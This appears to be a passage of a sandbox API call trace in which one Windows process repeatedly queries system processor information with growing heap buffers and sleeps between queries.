0x29585b8 [0221.006] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.006] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.006] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.007] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.007] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.007] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.008] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.008] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.008] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.009] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.009] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.009] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.010] Sleep (dwMilliseconds=0x110) [0221.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.024] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.024] Sleep (dwMilliseconds=0x110) [0221.028] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.028] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.029] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.029] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.029] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.035] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.036] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.036] Sleep (dwMilliseconds=0x110) [0221.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.051] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.052] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.052] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.053] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.053] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.054] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.054] Sleep (dwMilliseconds=0x110) [0221.060] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.060] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.060] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.060] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.060] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.061] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.061] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.063] Sleep (dwMilliseconds=0x110) [0221.076] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.076] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.084] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.084] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.085] Sleep (dwMilliseconds=0x110) [0221.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.098] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.099] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.099] Sleep (dwMilliseconds=0x110) [0221.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.107] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.113] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.114] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.114] Sleep (dwMilliseconds=0x110) [0221.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.130] Sleep (dwMilliseconds=0x110) [0221.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.145] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.145] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.147] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.147] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.147] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.148] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.148] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.148] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.148] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.153] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.154] Sleep (dwMilliseconds=0x110) [0221.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.175] Sleep (dwMilliseconds=0x110) [0221.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.188] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.191] Sleep (dwMilliseconds=0x110) [0221.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.221] Sleep (dwMilliseconds=0x110) [0221.232] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.232] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.233] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.233] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.233] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.233] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.234] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 